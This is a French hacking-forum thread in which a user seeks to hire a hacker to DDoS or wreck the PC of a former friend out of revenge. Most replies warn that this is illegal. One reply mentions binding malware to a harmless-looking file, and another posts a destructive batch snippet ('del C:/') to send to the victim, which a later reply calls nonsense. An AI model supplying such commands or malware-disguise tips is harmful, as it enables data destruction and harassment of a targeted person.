Résolu bonjour je recherche un Hacker .

media

Membre
Réactions
0
RGCoins
25
bonjour je recherche un Hacker pour attaquer un ancien pote qui ma fait des truc pas très sympas , a moi et a ma famille , je recherche un hacker pour le ddos ou je c'est pas , je pourais vous payer par strapass si vous le voullé . Mais je veux une preuve que vous le ferier et que je me ferais pas arnaquer .

Alors tu laisse tomber, c'est tout, je sais pas si tu le sais mais si le mec en face récupère des preuves comme quoi tu à pénétré sur sa machine sans son consentement, tu risque gros ( pareil si lance une attaque DoS sur sa connexion ).
Pour l'idée du fichier *.bat, c'est puérile, sa l'emmerdera 10 minutes, le temps de restaurer son système à neuf, c'est tout ( il faudrait encore qu'il soit assez stupide pour le lancer ).

Et on peux savoir ce qu'il t'a fait et pourquoi ?

Alors tu laisse tomber, c'est tout, je sais pas si tu le sais mais si le mec en face récupère des preuves comme quoi tu à pénétré sur sa machine sans son consentement, tu risque gros ( pareil si lance une attaque DoS sur sa connexion ).
Pour l'idée du fichier *.bat, c'est puérile, sa l'emmerdera 10 minutes, le temps de restaurer son système à neuf, c'est tout ( il faudrait encore qu'il soit assez stupide pour le lancer ).

Et on peux savoir ce qu'il t'a fait et pourquoi ?
oui tu a surement raison mais sache que se qu'il ma fait bah ça ma fais énormément de mal dabort avant c'était mon meilleure pote pi il a désidé un jour de prendre ma ptite copine pour lui ... malgré moi je n'est rien pus faire . En plus quand je suis allez chez lui pour comprendre un peu pourquoi ... il a traité ma mére et mon pére son parlez de mon ptit frére de 5ans / et sa c'est la famille et jamais je ne laisserait faire sa . Donc si un hacker lui hack sont pc est que sont pc soit dead il aura aucune preuve .

Il a essayé de te prendre ta copine ? C'était ton meilleur pote ? Et il habite à 800km de chez ?! Euh, ya pas un bug dans l'équation là ?
C'est simple, soit tu porte tes couilles comme il l'a fait et tu règle sa face à face, soit tu t'amuse à lui pourrir son PC ( mais bon, j'ai pas l'impression que tu ai es connaissances pour ), soit tu ne fait rien et tu fais en sorte qu'il t'oublie.

Mais dit toi que toi, contrairement à lui, ton action est illégale et punie par la loi.

Tu peux bind ton malware à un fichier tous à fait safe oui, mais bon, c'est vite repéré si on analyse l'exécutable final ( et puis si ils le découvrent et qu'ils porte plainte, tu va être dans une merde pas possible ... ) et adieux l'amitié avec ton pote ( parce qu'un mec qui nous espionne, c'est moyen quoi quand ces sensé être un pote )

Au pire tu veux le faire chier ?

Colle sa dans le bloc note :

@echo off
del C:/
stop

et rename l'extension en .bat

Et envoi lui
C'est des conneries ça ._.

Windows demande l'autorisation déja pour lancer le programme , deuxièmement un .bat ça fais suspect , et personne n'a l'autorisation ( pas même toi) de supprimer tout ton disque dur , c'est impossible , même en étant super admin de ta session ._.

Retour